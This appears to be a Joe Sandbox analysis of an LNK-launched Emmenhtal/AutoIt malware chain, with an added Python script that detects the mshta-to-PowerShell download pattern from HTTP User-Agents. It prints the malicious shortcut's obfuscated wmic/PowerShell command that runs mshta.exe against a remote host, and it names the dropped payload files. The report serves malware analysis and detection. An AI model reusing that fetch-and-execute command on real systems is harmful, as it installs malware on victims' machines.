Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0087D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_0087D164
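The HTTP entries above show three distinct client fingerprints against one host: an MSIE 7.0 / Trident/7.0 User-Agent for the first-stage fetch of /ghep2412_2 (the UA WinINet presents, which matches the mshta.exe process seen in the memory dumps), a "WindowsPowerShell/5.1.19041.1682" User-Agent for /ALGglt, and requests for /XKIZdXAs.exe, /Project_Information.pdf and /ZxVMIVZIX.txt that carry no User-Agent at all (System.Net.WebClient sends none by default). The following Python is an added example, not part of the Joe Sandbox report or of any vendor's detection content: it parses raw HTTP/1.1 request headers modelled on the entries above (the sample requests are constructed, with an invented example.com request as a benign control), tags each request by client type and download target, and raises a per-host "handoff" finding when the same host sees both a Trident-UA request and a scripted (PowerShell-UA or UA-less) request, which is the pattern this chain produces. The tag names and thresholds are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample requests, modelled on the "HTTP traffic detected" entries in this report.
# The last request (example.com, browser UA) is a benign control and is not from the report.
SAMPLE_REQUESTS = [
    "GET /ghep2412_2 HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-CH\r\nUA-CPU: AMD64\r\n"
    "Accept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; "
    "Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
    ".NET CLR 3.5.30729)\r\nHost: tiffany-careers.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /ALGglt HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
    "WindowsPowerShell/5.1.19041.1682\r\nHost: tiffany-careers.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /XKIZdXAs.exe HTTP/1.1\r\nHost: tiffany-careers.com\r\n\r\n",
    "GET /Project_Information.pdf HTTP/1.1\r\nHost: tiffany-careers.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /ZxVMIVZIX.txt HTTP/1.1\r\nHost: tiffany-careers.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 Chrome/120.0 Safari/537.36\r\nHost: example.com\r\n\r\n",
]

IE_TRIDENT_UA = re.compile(r"MSIE \d+\.\d+;.*Trident/")   # WinINet / IE engine clients such as mshta.exe
POWERSHELL_UA = re.compile(r"WindowsPowerShell/\d")         # Invoke-WebRequest / Invoke-RestMethod default UA
PE_EXTENSIONS = (".exe", ".dll", ".pif", ".scr")


def parse_request(raw):
    """Split one raw HTTP/1.1 request into method, path and a lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def classify(req):
    """Return the list of tags for one request; an empty list means nothing suspicious."""
    tags = []
    ua = req["headers"].get("user-agent")
    path = req["path"]
    if ua is None:
        tags.append("no-user-agent")          # WebClient-style download with no UA header at all
    elif POWERSHELL_UA.search(ua):
        tags.append("powershell-ua")
    elif IE_TRIDENT_UA.search(ua):
        tags.append("ie-trident-ua")
    scripted = ua is None or "powershell-ua" in tags
    filename = path.rsplit("/", 1)[-1]
    if scripted and filename.lower().endswith(PE_EXTENSIONS):
        tags.append("scripted-pe-download")   # what the Suricata "PowerShell HTTP PE File Download" rule keys on
    if scripted and filename and "." not in filename:
        tags.append("scripted-extensionless-fetch")
    return tags


def correlate(raw_requests):
    """Classify every request and list hosts that saw both a Trident-UA fetch and a scripted fetch."""
    per_request = []
    tags_by_host = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        tags = classify(req)
        host = req["headers"].get("host", "?")
        per_request.append((host, req["path"], tags))
        tags_by_host[host].update(tags)
    handoff_hosts = sorted(
        host for host, tags in tags_by_host.items()
        if "ie-trident-ua" in tags and tags & {"powershell-ua", "no-user-agent"}
    )
    return per_request, handoff_hosts


if __name__ == "__main__":
    findings, hosts = correlate(SAMPLE_REQUESTS)
    for host, path, tags in findings:
        print(f"{host}{path}: {', '.join(tags) or 'clean'}")
    print("mshta-to-PowerShell handoff hosts:", hosts)
```

Run against proxy or Zeek http.log records the same way by reconstructing the request line and headers per record; the per-host correlation is the part worth keeping, since a lone PowerShell-UA request to a CDN is common noise while a Trident-UA fetch of an extensionless path followed by UA-less PE downloads from the same host rarely is.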

System Summary

barindex
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], type: DROPPED | Matched rule: Emmenhtal Loader string, Author: Sekoia.io
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_1dc1e972-3)
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@* (memstr_4385b895-b)
Source: powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_20ea604d-1)
Source: powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@* (memstr_14c04349-8)
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: This is a third-party compiled AutoIt script. 15_2_00007FF7ADC037B0
Source: XKIZdXAs.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_86bb9fe7-7
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_1a937d80-3
Source: WMIC.exe, 00000000.00000002.1415926218.000001E381E8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"``memstr_490453d5-3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XKIZdXAs.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: n5Szx8qsFB.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC83E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,15_2_00007FF7ADC83E20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7ADC6CE68
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00007FF7ADC7D750
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_00BB5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00855778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_00855778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC9F630
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC10E70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC20E90
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCACE8C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC12E30
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC46DE4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC42D20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC330DC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC02AE0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCA0AEC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC96C34
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCAC6D4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCAA59C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCA055C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC3A8A0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC467F0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC202C4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC2C130
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC24514
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC384C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC2C3FC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC42400
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC883D4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC98360
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC96320
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC2BEB4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC0BE70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC9206C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC05F3C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC81A18
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC1FA4F
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC0B9F0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCABA0C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC3793C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC13C20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCADB18
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC956A0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC395B0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC158D0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC2F8D0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7D87C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC0183C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC41840
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADCB17C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC31750
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC932AC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC4529C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC0B390
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B5B020
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B594E0
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B59C80
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B723F5
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BD8400
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B86502
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B5E6F0
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B8265E
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7282A
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B889BF
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BD0A3A
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B86A74
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B60BE0
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BAEDB2
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7CD51
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BD0EB7
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB8E44
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B86FE6
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B733B7
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7F409
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B6D45D
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B716B4
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B5F6A0
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B6F628
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B51663
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B778C3
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7DBA5
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B71BA8
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B89CE5
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B6DD28
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7BFD6
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B71FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007FB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007F94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007F9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_008123F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00878400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00826502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007FE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0082265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_008289BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00870A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00826A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00800BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0084EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00870EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00858E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00826FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_008133B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0080D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007F1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_008116B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0080F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_007FF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_008178C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00811BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00829CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0080DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00811FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081BFD6
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: String function: 00007FF7ADC28D58 appears 76 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00B78B30 appears 42 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00B70D17 appears 70 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00B61A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00810D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00801A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00818B30 appears 42 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 2584
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], type: DROPPED | Matched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
Source: classification engine | Classification label: mal100.expl.evad.winLNK@43/71@5/2
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC83778: GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC6CCE0: AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC6D5CC: LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BA8DE9: AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BA9399: LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00848DE9: AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00849399: LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC859D8: SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC9EB34: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC86D04: CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC06580: CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8652:120:WilError_03
